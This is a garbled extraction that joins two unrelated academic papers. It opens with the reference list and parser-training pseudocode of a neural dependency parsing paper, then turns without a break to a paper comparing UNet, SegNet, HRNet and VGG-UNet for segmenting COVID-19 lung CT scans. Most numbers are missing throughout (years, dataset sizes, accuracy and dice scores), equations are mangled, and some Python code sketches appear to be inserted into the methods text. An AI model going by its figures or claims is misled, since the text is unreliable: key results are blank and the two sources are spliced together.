mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . marco marelli, luisa bentivogli, marco baroni, raf- faella bernardi, stefano menini, and roberto zampar- elli. . semeval- task : evaluation of com- positional distributional semantic models on full sen- tences through semantic relatedness and textual entail- ment. in proceedings of the th international work- shop on semantic evaluation (semeval ), pages – , dublin, ireland, august. association for compu- tational linguistics and dublin city university. andre martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non- projective turbo parsers. in proceedings of the st annual meeting of the association for computational linguistics (volume : short papers), pages – , sofia, bulgaria, august. association for computa- tional linguistics. ryan mcdonald. . discriminative training and spanning tree algorithms for dependency parsing. ph.d. 
thesis, university of pennsylvania. tomas mikolov, martin karafiát, lukás burget, jan cernocký, and sanjeev khudanpur. . re- current neural network based language model. in interspeech , th annual conference of the international speech communication association, makuhari, chiba, japan, september - , , pages – . wenzhe pei, tao ge, and baobao chang. . an ef- fective neural network model for graph-based depen- dency parsing. in proceedings of the rd annual meeting of the association for computational linguis- tics and the th international joint conference on nat- ural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. mike schuster and kuldip k. paliwal. . bidirec- tional recurrent neural networks. ieee trans. signal processing, ( ): – . richard socher, christopher manning, and andrew ng. . learning continuous phrase representations and syntactic parsing with recursive neural net- works. in proceedings of the deep learning and unsupervised feature learning workshop of (nips) , pages – . richard socher, john bauer, christopher d. manning, and andrew y. ng. a. parsing with composi- tional vector grammars. in proceedings of the st annual meeting of the association for computational linguistics, acl , - august , sofia, bul- garia, volume : long papers, pages – . richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew ng, and christopher potts. b. recursive deep models for semantic compositionality over a sentiment treebank. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa, october. association for computational linguistics. richard socher. . recursive deep learning for natural language processing and computer vision. ph.d. thesis, stanford university, august. pontus stenetorp. . transition-based dependency parsing using recursive neural networks. in deep learning workshop at the conference on neural information processing systems (nips), lake tahoe, nevada, usa, december. ilya sutskever, oriol vinyals, and quoc v. le. . se- quence to sequence learning with neural networks. in advances in neural information processing systems : annual conference on neural information pro- cessing systems , december - , montreal, quebec, canada, pages – . kai sheng tai, richard socher, and christopher d. man- ning. . improved semantic representations from tree-structured long short-term memory networks. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. stephen tratz and eduard hovy. . a fast, accurate, non-projective, semantically-enriched parser. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , edinburgh, scotland, uk., july. association for computational linguistics. taro watanabe and eiichiro sumita. . transition- based neural constituent parsing. in proceedings of the rd annual meeting of the association for com- putational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. david weiss, chris alberti, michael collins, and slav petrov. . structured training for neural network transition-based parsing. 
in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long pa- pers), pages – , beijing, china, july. associa- tion for computational linguistics. yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing. in proceedings of the conference on empirical methods in nat- ural language processing, pages – , honolulu, hawaii, october. association for computational lin- guistics. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – , portland, ore- gon, usa, june. association for computational lin- guistics. xingxing zhang, liang lu, and mirella lapata. . tree recurrent neural networks with application to lan- guage modeling. corr, abs/ . . chenxi zhu, xipeng qiu, xinchi chen, and xuanjing huang. . a re-ranking model for dependency parser with recursive convolutional neural network. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. appendix: training algorithm pseudocode algorithm training on annotated corpus : input: sentences w , . . . ,wm : input: tree annotations t , . . . ,tm : input: number of epochs to train : v ← initializev ectors() : loss ← [] : for epoch ∈{ , . . . ,epochs} do : for s,t ∈{(w ,t ), . . . ,(wm,tm)} do : loss ← trainsentence(s,v [w , . . . ,wn],t,loss) : if |loss| > then : sumloss ← sum(loss) : call adam to minimize sumloss : loss ← [] (see algorithm , training of a single sentence, on next page.) algorithm training on a single sentence with dynamic oracle algorithm : function trainsentence(w,v,t,loss) : input: sentence w = w , . . . ,wn : input: vectors vi corresponding to inputs wi : input: annotated tree t in the form of (h,m,rel) triplets : input: list loss to which loss expressions are added : for i ∈ , . . . ,n do : unassigned[i] ←|children(wi)| : pend[i].id ← i : pend[i].el ← rnnl.init().append(vi) : pend[i].er ← rnnr.init().append(vi) : while |pend| > do : g,w ←{} ,{} : for (i,d,rel) ∈{ ≤ i < |pend|,d ∈{l,r},rel ∈ relations} do : if d = l then m,h ← pend[i], pend[i + ] : else m,h ← pend[i + ], pend[i] : if unassigned[m.id] = ∨∃` =rel(h,m,`) ∈ t then : w.append((h,m,rel)) : else g.append((h,m,rel)) : hg,mg,relg ← argmax(i,d,`)∈gscore(pend,i,d,`) : hw ,mw ,relw ← argmax(i,d,`)∈w score(pend,i,d,`) : scoreg ← score(hg,mg,relg) : scorew ← score(hw ,mw ,relw ) : if scoreg −scorew < then : h,m,rel,score ← hw ,mw ,relw ,scorew : else if scoreg −scorew > ∨random() < paug then : h,m,rel,score ← hg,mg,relg,scoreg : else : h,m,rel,score ← hw ,mw ,relw ,scorew : if scoreg −score < then : loss.append( −scoreg + score) : m.c = m.el ◦m.er : m.enc = g(w(m.c◦rel) + b) : if h.id < m.id then h.el.append(m.enc) : else h.er.append(m.enc) : unassigned[tparent(m).id] ← unassigned[tparent(m).id]− : pend.remove(m) : return loss performance analysis of lightweight cnn models to segment infectious lung tissues of covid- cases from tomographic images performance analysis of lightweight cnn models to segment infectious lung tissues of covid- cases from tomographic images tharun j. 
iyer , alex noel joseph raj , sushil ghildiyal and ruban nersisson school of electrical engineering, vellore institute of technology, vellore, tamil nadu, india department of electronic engineering, shantou university, shantou, guangdong, china abstract the pandemic of coronavirus disease- (covid- ) has spread around the world, causing an existential health crisis. automated detection of covid- infections in the lungs from computed tomography (ct) images offers huge potential in tackling the problem of slow detection and augments the conventional diagnostic procedures. however, segmenting covid- from ct scans is problematic, due to high variations in the types of infections and low contrast between healthy and infected tissues. while segmenting lung ct scans for covid- , fast and accurate results are required and furthermore, due to the pandemic, most of the research community has opted for various cloud based servers such as google colab, etc. to develop their algorithms. high accuracy can be achieved using deep networks but the prediction time would vary as the resources are shared amongst many thus requiring the need to compare different lightweight segmentation model. to address this issue, we aim to analyze the segmentation of covid- using four convolutional neural networks (cnn). the images in our dataset are preprocessed where the motion artifacts are removed. the four networks are unet, segmentation network (seg net), high-resolution network (hr net) and vgg unet. trained on our dataset of more than , images, hr net was found to be the best performing network achieving an accuracy of . % and a dice score of . . the analysis shows that lightweight cnn models perform better than other neural net models when to segment infectious tissue due to covid- from ct slices. subjects algorithms and analysis of algorithms, artificial intelligence, emerging technologies keywords convolutional neural networks, computed tomography, covid- , segmentation, high-resolution network (hr net), segmentation network (seg net), unet, vgg-unet introduction during the winter months december , a highly contagious disease out broke in wuhan, china (zhu et al., ; liu et al., ). high grade fever and other flu like symptoms were noticed, and most of the patients developed pneumonia. the pathogen causing the disease was identified as corona virus, and named as severe acute respiratory how to cite this article iyer tj, joseph raj an, ghildiyal s, nersisson r. . performance analysis of lightweight cnn models to segment infectious lung tissues of covid- cases from tomographic images. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted january published february corresponding author ruban nersisson, nruban@vit.ac.in academic editor marcin woźniak additional information and declarations can be found on page doi . /peerj-cs. copyright iyer et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:nruban@�vit.�ac.�in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ syndrome corona virus- (sars-cov- ) (world health organization, ). the disease caused by the virus is named by world health organization (who) as corona virus disease (covid- ). who also declared covid spread as global public health emergency (world health organization, ). 
as of th may , more than countries around the world are affected by covid- . there are around million people affected by the disease worldwide with a mortality rate of % (around . million people lost their lives). developed countries like us, europe and most of the developing countries are suffering a lot from the outbreak. the scientific community is largely involved in devising an antidrug and vaccines for the device. but unfortunately there are no positive results till date and more over it is reported that, due to mutations, characteristics are changing which makes the vaccine development even more challenging. taking the situation into account, there are very few ways we can control the virus; like staying isolated from the world and breaking the spreading chain of the virus, maintaining the personal hygiene, early detection of the symptoms and taking necessary precautions are few of them. the successful control of the outbreak depends on the rapid and accurate detection and identification of the symptoms isolating the patient from the community, so that the spread of the disease can be stopped. currently, the method used for the detection is real-time reverse transcriptase polymerase chain reaction (rt-pcr) (li & xia, ). it is the standard procedure used by many hospitals and clinics for testing covid- cases. even though this method remains the reference standard, there are many reported false negative cases using this rt-pcr (chan et al., ), which is an alarming fact on the situation. it is also time consuming and the limited supply of rt-pcr kits for the rural areas make the testing more difficult (chen, yao & zhang, ). since the covid- patients develop breathe related discomfort and pneumonia as the outcome of the disease progress, radiological studies can play a vital role in diagnosing the lung infections caused by this episode (zu et al., ). the ct chest scan can be used to identify the early stages of lung infections and related problems. the chest ct reveals the initial pulmonary abnormalities for covid- patients for whom rt-pcr gave negative results (ai et al., ). also, to accurately and efficiently control the virus, studies have been conducted to implement forecasting models to predict the spread of covid- (wieczorek, siłka & woźniak, ). due to the nature of the problem being a regression problem to forecast the spread and predict how the virus may spread, artificial neural networks (anns) and recurrent neural networks (rnns) were used to model the data. data was collected from the center for systems science and engineering (csse) at johns hopkins university. to further improve the accuracy of prediction and decrease the error rate, deep learning was widely used as a predictor and forecasting model. generative adversarial networks (gans), extreme learning machine (elm), and long/short term memory (lstm) were some models used to predict the spread of the virus (jamshidi et al., ). the performance of the deep learning differed significantly from the use of rnns and anns. therefore, we decided to use deep learning methods in our study to explore the performance of models on our data. to approach the solution of using deep learning iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ methods to segment lung ct scans, we looked at studies conducted on detecting small nodules or lung tissue using complex neural networks. capizzi et al. 
( ) used probabilistic neural networks and a bio-inspired reinforcement learning network based on fuzzy logic to accurately segment lung nodules. the network worked at . % accuracy and considerably lowered the computational demands of the detection and segmentation system. ke et al. ( ) proposed a neuro-heuristic algorithm to segment lung diseases from x-ray images. the algorithm achieved an average accuracy of . % to segment and classifies three diseases in the x-ray images. but for our study, ct scans were chosen as the primary source of data due to the easy availability and higher number of slices per scan. therefore, we would have more data than x-ray images. the common manifestations of sars-cov- in chest ct scan are ground glass opacities, consolidation, crazy paving, dilation of vessel width in some cases and round shape lesions in few cases (hamer et al., ; zu et al., ). the effectiveness of the chest ct scan based covid- management depends on the efficient automatic detection and segmentation of regions in the scan. so in that context, the recent developments in the imaging technologies come handy. there are plenty of imaging tools which give very high and accurate quantification of abnormal conditions. this procedure of image based diagnosis system involves capturing the image, analyzing the image by a trained, experienced radiologist and annotation is made for the ground truth segments. the current scenario slows down the annotation of the images, labeling and getting the ground truth processes due to the increasing number of patients day by day, lack of radiologist and the over duty burden of existing radiologists. therefore, automatically detecting the infected regions from the chest ct scan using computer based algorithms are the current trends in research that gives wonderful results and aids in medical diagnostics. the main objective of the research work is, comparing the segmentation performance of computationally non-intensive models deep learning model when subjected to lung ct scans for that are affected by covid- . the models utilized for the research belong to the u-net variants models which are the most popular models of choice for segmentation of medical images. here we compare the traditional u-net model as proposed by ronneberger with other variants such as seg net, u-net based on vgg and high resolution net (hr-net) and present both qualitative and quantitative results. materials and methods the block diagram describing the entire methodology is shown below in fig. . the description of each method is described below. dataset considered the used dataset consists of , images and their corresponding ground truths. a total of , training images are used and testing images are used. the ct scans of patients were taken from mosmed.ai (morozov et al., ) were openly accessible neuroimaging informatics technology initiative (nifti) images were provided. the data was collected from the research and practical clinical center for diagnostics and iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ telemedicine technologies of the moscow health care department. the ct scans were obtained between st march and th april . each nifti file was decompressed to png images and used for the study. the ct scans of another patients were taken from zenodo.org (jun et al., ) where the nifti files of patients were provided. the images were annotated by two radiologists and verified by an experienced radiologist. 
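the nifti volumes described above were decompressed into per-slice png images before training. the authors report doing this in matlab; purely as a hedged python alternative, a sketch using the nibabel, numpy and imageio packages (file and folder names here are hypothetical) could look like this:

```python
# sketch: decompress a NIfTI CT volume into per-slice PNG images.
# the paths are hypothetical; the paper performed this step in MATLAB.
import os
import numpy as np
import nibabel as nib
import imageio

def nifti_to_png(nifti_path, out_dir):
    os.makedirs(out_dir, exist_ok=True)
    volume = nib.load(nifti_path).get_fdata()            # shape (H, W, num_slices)
    # window the raw intensities into 0-255 for 8-bit PNG output (illustrative choice)
    lo, hi = np.percentile(volume, [1, 99])
    volume = np.clip((volume - lo) / (hi - lo + 1e-8), 0, 1) * 255
    for i in range(volume.shape[-1]):
        imageio.imwrite(os.path.join(out_dir, f"slice_{i:03d}.png"),
                        volume[..., i].astype(np.uint8))

# nifti_to_png("ct_scan.nii.gz", "slices/")  # hypothetical usage
```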
for both datasets, matlab was used to extract the png images. pre-processing the images in the dataset are riddled with motion artifacts and noise. motion artifacts are caused due to improper imaging techniques and are a specific kind of noise relevant to ct scans. therefore, removing this noise is important or else it will cause the algorithms to learn improperly. matlab is used to remove the noise and motion artifacts. the original image is converted to grayscale from rgb and then, the image properties are extracted. area and solidity are used and then, the image is thresholded after selecting the max area and highest solidity. once a mask is ready, the mask is multiplied with the original image to get the pre-processed image. a comparison is given below in fig. . as can be seen, motion artifacts are removed and the image has more clarity. other pre-processing methods to remove the noise and motion artifacts from lung ct images are using a mean filter (khan, ) and a series of region growing and morphological applications (devarapalli, kalluri & dondeti, ). these methods were mainly used to remove the sharp edges in the ct scans and to smoothen the image so that the network could learn better. but, on comparison of the different methods, our pre-processing method provided a better performance in all metrics hr net hrnet is developed at microsoft and has signified state of art presentation in the areas of semantic segmentation, image classification, facial detection, object detection and figure comparison between original image (a) and pre-processed image (b). full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pose estimation (sun et al., ). its attention is on training high resolution (hr) representation. the existing techniques recuperate representation of high resolution from representation of low resolution formed by high to low resolution network. in hrnet, from first stage commencement high-resolution network, progressively augment high to low resolution networks successively to arrange more steps and associate the multi- resolution network in parallel. hrnet is able of uphold high-resolution representation throughout the process as repeated multi-scale combinations are conducted by switching the information through the multi-resolution parallel subnetworks repeatedly throughout the process (sun et al., ). the architecture of resulting network is displayed in fig. . this network has advantages in contrast to existing networks like segnet, unet, hourglass etc. these existing networks lose a lot of essential information in the progression of recovering high-resolution from low-resolution representation. hrnet links high to low resolution networks in parallel instead of series and this gives high-resolution representation throughout the process, correspondingly the estimated heatmap is much accurate, spatially much precise. figure block diagram of proposed method. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
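returning to the pre-processing step described above (grayscale conversion, keeping the connected region with the largest area and highest solidity, and multiplying the resulting mask with the original slice), the authors implemented it in matlab; a hedged python sketch of the same idea with scikit-image is given below. the thresholding method and function structure are our own illustrative assumptions, not the paper's code.

```python
# sketch of the described artifact-removal step: keep only the largest,
# most solid connected region and mask the original slice with it.
import numpy as np
from skimage import color, filters, measure

def remove_motion_artifacts(rgb_slice):
    gray = color.rgb2gray(rgb_slice)                    # rgb -> grayscale
    # initial foreground estimate; Otsu is an assumption, the paper does not
    # state which threshold it used.
    binary = gray > filters.threshold_otsu(gray)
    labels = measure.label(binary)
    regions = measure.regionprops(labels)               # gives .area and .solidity
    if not regions:
        return gray
    # select the region with the maximum area and highest solidity
    best = max(regions, key=lambda r: (r.area, r.solidity))
    mask = labels == best.label
    return gray * mask                                   # multiply mask with the image
```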
https://peerj.com/computer-science/ multi-resolution sequential subnetwork existing models works by linking high to low resolution convolutions subnetwork in series, where each individual subnetwork form a platform, collection of an arrangement of convolutions furthermore, there is a down sample layer through end-to-end subnetworks to split the resolution into halves. let n sr be the subnet in the stage sth and resolution index r. first subnet resolution is given by r� . the high-to-low system with s phases/stages (i.e., ) can be indicated as: n ! n ! n ! n ( ) multi-resolution parallel subnetwork starting from first phase/stage begin with high resolution subnet, slowly enhance high to low resolution subnet, generating new phases/stages, and associate multi-resolution subnet in parallel. eventually, the parallel subnet resolution of a later phase/stage comprises of the resolution from an earlier stage and below one stage. the network shown below contains parallel subnets. ( ) figure architecture of hrnet. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multi-scale repeated fusion in this network exchange units were introduced throughout parallel subnet in such a way that an individual subnet continuously collects information from parallel subnets. how information is exchanged lets understand this process through an example here third stage is subdivided into multiple exchange blocks and every block consists of three parallel convolution modules, having exchange units followed by parallel units which is shown below: ( ) where: cbsr – convolution module, ebs – exchange unit, and s is the stage, r is the resolution and b is the block explanation of exchange units is show in fig. . the input mapping is given by: {x ; x ; x ; . . . ; xsg and the output mapping was given by: fy ; y ; y ; . . . ; ysg. the width and resolution of the output is same as input. every output is a sum of input mapping that is, yk ¼ ps i¼ aðxi; kÞ. assume of � stride was done for down sampling and for up sampling � convolution (nearest neighbor). hrnet experimental results (when tested with different datasets) show remarkable results for the applications like facial detection, semantic segmentation, and object detection. seg net at the university of cambridge, uk, team of the robotics group researched and developed that segnet is a deep encoder decoder architecture for multiclass pixel-wise segmentation (badrinarayanan, kendall & cipolla, ). the framework comprises order of non-linear processing layers which is called encoders and a similar set of decoders afterward a pixel wise classifier. generally, encoder have made up of a relu non-linearity and one or more convolutional layers with batch normalization, subsequently non- overlapping maxpooling and subsampling. using max-pooling indices in encoding sequence, for up sampling the sparse encoding in consequence the pooling process to the decoder. use of max-pooling indices in the decoders is the one important feature of the segnet to execute the sampling of low resolution maps. for segmented images the tendency to retain high frequency details and capable enough to decrease the number of iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ parameters in the decoder needed for training are some advantages of segnet. 
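the pooling-indices idea that distinguishes segnet can be shown in a few lines of pytorch: the encoder's max-pooling layer returns the indices of the retained activations, and the decoder reuses those indices to place values back into a sparse, upsampled map before convolving. this is a minimal illustrative block under assumed channel sizes, not the full segnet.

```python
# minimal sketch of SegNet-style unpooling with stored max-pooling indices.
import torch
import torch.nn as nn

class TinySegNetBlock(nn.Module):
    def __init__(self, c_in, c_mid, n_classes):
        super().__init__()
        self.enc = nn.Sequential(nn.Conv2d(c_in, c_mid, 3, padding=1),
                                 nn.BatchNorm2d(c_mid), nn.ReLU(inplace=True))
        self.pool = nn.MaxPool2d(2, stride=2, return_indices=True)   # keep the indices
        self.unpool = nn.MaxUnpool2d(2, stride=2)                    # reuse them later
        self.dec = nn.Sequential(nn.Conv2d(c_mid, c_mid, 3, padding=1),
                                 nn.BatchNorm2d(c_mid), nn.ReLU(inplace=True),
                                 nn.Conv2d(c_mid, n_classes, 1))     # pixel-wise classifier

    def forward(self, x):
        feat = self.enc(x)
        pooled, indices = self.pool(feat)           # encoder stores pooling indices
        upsampled = self.unpool(pooled, indices)    # decoder upsamples without learning
        return self.dec(upsampled)

# TinySegNetBlock(1, 16, 2)(torch.randn(1, 1, 64, 64)).shape -> (1, 2, 64, 64)
```

because only the indices (not the full encoder feature maps) are carried over, this style of decoder needs fewer parameters than one that learns its own upsampling, which is the advantage noted above.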
using stochastic gradient descent this framework can be trained end-to-end. segnet is composed of encoder and decoder after a last pixel-wise classification layer. the architecture is shown in fig. . the encoder in segnet is composed of convolution layers which are in number, and these layer matches with the starting layers of vgg , considered for classifying the objects (mannem, ca & ghosh, ). figure illustrates the decoding method utilized by segnet in which there is no learning engaged with the up-sampling stage. the upsampling of decoder network’s feature map (input) is done by learned maxpooling indices from the equivalent encoder feature map. dense feature maps are generated by combining feature maps and trainable decoder channel. segnet a deep network was used for semantic segmentation. basically, it was designed because the motivation behindhand was to propose an architecture for roads, outdoor and indoor sites which is proficient together in terms of computational time and memory. feature map’s maxpooling indices are only stored in segnet and to attain better performance it uses them in its decoder network. unet the unet design is based upon the fully convolution network and adjusted such that it produces better segmentation results in medical imaging. unet consists of two paths named as contracting and and expansive. in the contracting path it captures the context whereas in expansive path it enables exact localization. while contracting path is a classical figure layers of exchange unit of convolutions with various resolutions: (a) low, (b) medium and (c) high resolution. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ architecture of unet. it includes two × convolutions, max pooling operation with repeating application. the fig. illustrates the architecture of unet, which is u in shape that itself gives the name “unet”. the main philosophy behind this network is, it replace pooling operation by using upsampling operators (ronneberger, fischer & brox, ). so, ultimately the resolution will increase layer by layer. the main feature of unet is the figure segnet architecture. photograph source credit: google earth image, © google. full-size doi: . /peerj-cs. /fig- figure decoding techniques used by segnet. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ large number of channels which lead to higher resolution. moreover, in every downsampling it doubles the feature channels. each stage in the expansive path involves upsampling of the feature channel followed by ( × ) convolution that splits the number of feature channels into halves. in contracting path, it crops the feature map because of loss in border pixel in each convolution. final layer is mapped by × convolutions which is used to map all units feature vector. the network contains total convolutional layers. unet performs well on image segmentation (livne et al., ). 
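as a concrete companion to the unet description above (repeated convolutions and max pooling on the contracting side, upsampling plus concatenated skip features on the expansive side, and a final pixel-wise convolution), here is a deliberately small, illustrative pytorch sketch with a single down/up stage; padding is used instead of the original cropping, and all channel sizes are our own choices rather than the paper's configuration.

```python
# tiny illustrative U-Net with one contracting and one expansive stage.
import torch
import torch.nn as nn

def double_conv(c_in, c_out):
    # two 3x3 convolutions with ReLU, as in the contracting-path description
    return nn.Sequential(nn.Conv2d(c_in, c_out, 3, padding=1), nn.ReLU(inplace=True),
                         nn.Conv2d(c_out, c_out, 3, padding=1), nn.ReLU(inplace=True))

class TinyUNet(nn.Module):
    def __init__(self, in_ch=1, base=16, n_classes=1):
        super().__init__()
        self.down = double_conv(in_ch, base)
        self.pool = nn.MaxPool2d(2)
        self.bottom = double_conv(base, base * 2)                     # channels double when downsampling
        self.up = nn.ConvTranspose2d(base * 2, base, 2, stride=2)    # up-convolution halves channels
        self.decode = double_conv(base * 2, base)                     # skip features concatenated here
        self.head = nn.Conv2d(base, n_classes, 1)                     # final 1x1 convolution

    def forward(self, x):
        d = self.down(x)
        b = self.bottom(self.pool(d))
        u = self.up(b)
        u = torch.cat([d, u], dim=1)                                  # skip connection
        return self.head(self.decode(u))

# TinyUNet()(torch.randn(1, 1, 64, 64)).shape -> (1, 1, 64, 64)
```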
while training the unet model, the cross-entropy loss function is combined with the final feature map by applying a pixel-wise softmax over it. the softmax is defined as:

p_k(x) = \frac{\exp(a_k(x))}{\sum_{k'=1}^{K} \exp(a_{k'}(x))}

in addition, the energy function is calculated by:

E = \sum_{x \in \Omega} w(x)\, \log\big(p_{\ell(x)}(x)\big)

where:
a_k(x): the activation in feature map k at pixel position x
p_k(x): the approximated maximum function (softmax)
K: the number of classes
x \in \Omega: the pixel position
p_{\ell(x)}(x): the softmax value of the true label \ell(x) at x, whose deviation from one is penalised

figure: illustration of the architecture of u-net.

in the training data set, to compensate for the different frequency of pixels from a certain class, the weight map is pre-calculated for each ground-truth segmentation; it also forces the network to learn the small separation borders that are introduced between touching cells. the separation borders are computed with morphological operations, and the weight map is calculated using:

w(x) = w_c(x) + w_0 \cdot \exp\!\left(-\frac{(d_1(x) + d_2(x))^2}{2\sigma^2}\right)

where:
w(x): the weight map
w_c(x): the class-balancing weight map
d_1(x): the distance to the border of the nearest cell
d_2(x): the distance to the border of the second nearest cell
w_0, \sigma: weighting constants

vgg unet
image segmentation, which is performed pixel-wise, is a key task in the field of computer vision. encoders and decoders, when combined, form unet architectures, which are very popular for image segmentation in medical imaging, satellite imagery, etc. the weights of pre-trained models (e.g., models trained on imagenet) are used to initialize the weights of the neural network, since a network initialized from a large dataset gives better performance than one trained from scratch on a small dataset. model accuracy is very important in applications such as traffic safety and medicine, and a pre-trained encoder can enhance the architecture and performance of unet. applications like object detection, image classification and scene understanding have improved their performance after the introduction of the convolutional neural network (cnn); nowadays, cnns outperform human experts in several fields. image segmentation plays a vital role in medical imaging to enhance diagnostic capabilities. the fully convolutional network (fcn) is amongst the most popular state-of-the-art machine learning techniques (long, shelhamer & darrell, ), and advances in fcns have improved segmentation accuracy on standard datasets such as pascal voc (everingham et al., ). unet consists of two paths, contracting and expansive. the contracting path captures context, whereas the expansive path enables exact localization. the contracting path follows the design of a convolutional network with alternating convolution and pooling operations, gradually downsampling the feature channels while expanding the number of feature maps; each stage in the expansive path is composed of an up-sampling of the feature channel along with a convolution. the vgg-unet architecture is illustrated in fig. . the encoder of the unet model is composed of successive (series) layers of the vgg family, denoted vgg- (ai et al., ). vgg- consists of convolution layers, each using the rectified linear unit (relu) activation function, and maxpooling operations, each of which reduces the feature channel by ; kernels of size × are used for every convolutional layer (iglovikov & shvets, ).
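before moving on, a short sketch makes the unet weight map and weighted pixel-wise loss defined above concrete. the distance transforms, constants and the simple class-balancing term are illustrative assumptions (a common reading of the formula), not the authors' code.

```python
# sketch: U-Net-style weight map w(x) = w_c(x) + w0 * exp(-(d1 + d2)^2 / (2*sigma^2))
# plus a weighted pixel-wise cross-entropy built from the same quantities
# (sign flipped relative to the energy above so that it is minimised).
import numpy as np
from scipy import ndimage

def unet_weight_map(label_mask, w0=10.0, sigma=5.0):
    """label_mask: integer mask, one id per cell/region, 0 = background. w0, sigma are illustrative."""
    dists = []
    for cell_id in np.unique(label_mask):
        if cell_id == 0:
            continue
        # distance of every pixel to the border of this particular cell
        dists.append(ndimage.distance_transform_edt(label_mask != cell_id))
    # simple inverse-frequency class balancing (illustrative choice for w_c)
    wc = np.where(label_mask > 0,
                  1.0 / max((label_mask > 0).mean(), 1e-8),
                  1.0 / max((label_mask == 0).mean(), 1e-8))
    if len(dists) < 2:
        return wc
    dists = np.sort(np.stack(dists), axis=0)
    d1, d2 = dists[0], dists[1]          # nearest and second-nearest cell borders
    return wc + w0 * np.exp(-((d1 + d2) ** 2) / (2.0 * sigma ** 2))

def weighted_cross_entropy(probs, labels, weights):
    """probs: (K, H, W) softmax output; labels: (H, W) integer labels; weights: (H, W)."""
    true_p = np.take_along_axis(probs, labels[None], axis=0)[0]
    return -(weights * np.log(true_p + 1e-8)).sum()
```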
a common loss function, binary cross entropy, can be used for the classification problem, where ŷ_i denotes the prediction, y_i denotes the true value and m denotes the number of samples:

H = -\frac{1}{m}\sum_{i=1}^{m}\big(y_i \log \hat{y}_i + (1 - y_i)\log(1 - \hat{y}_i)\big)

performance validation
to validate the performance of the models presented above, sensitivity, specificity, jaccard index, dice coefficient, accuracy and precision are used. to measure the accuracy of the segmented image, accuracy and precision are used, and to measure the quality of segmentation, sensitivity and specificity are used. the various performance measures are described below. accuracy and precision are used to calculate the accuracy of the segmentation model itself. accuracy is defined as the ratio of correct predictions to the total number of predictions, and precision is defined as the ratio of correctly predicted positive observations to the total number of predicted positive observations.

accuracy = \frac{TP + TN}{TP + TN + FP + FN}

precision = \frac{TP}{TP + FP}

figure: encoder-decoder architecture, also known as vgg-unet.

in the case of segmentation, accuracy and precision are used to measure the binary segmentation of each pixel of the image by the model. although precision and accuracy may seem to be enough to describe the performance of the model, other factors are also important to describe the quality of segmentation. sensitivity and specificity are used to measure the quality of segmentation between the classes. in this case, the models perform binary segmentation, so sensitivity, or the true positive rate, measures the quality of segmentation of one class and specificity, or the true negative rate, measures the quality of segmentation of the other class. sensitivity and specificity can be defined as:

sensitivity = \frac{TP}{TP + FN}

specificity = \frac{TN}{TN + FP}

for sensitivity and specificity, a high value for each is good, as it shows that the model is able to segment the pixels of both classes correctly. the jaccard index and dice coefficient are used to quantify the similarity between the original image and the segmented image. the jaccard index and dice coefficient are similar to the intersection over union (iou) used to evaluate object detection models. both range from 0 to 1, where 0 means no overlap and 1 means full similarity. the jaccard index and dice coefficient can be defined as:

dice\ coefficient = \frac{2\,TP}{2\,TP + FP + FN}

jaccard\ index = \frac{TP}{TP + FP + FN}

while the dice coefficient and the jaccard index are quite similar (each can be computed from the other), agreement between the two measures can be viewed as an indicator of consistent segmentation quality.

results and discussion
the experiments were conducted on the google colab platform. as shown in table , hr net is shown to have the highest performance as compared to the other models. the second best model is the classical unet, the third best model is the vgg unet, and the model with the worst performance is the seg net. the reason for the high performance of the hr net is the fact that hr net extracts high-resolution information and retains it throughout the segmentation process.
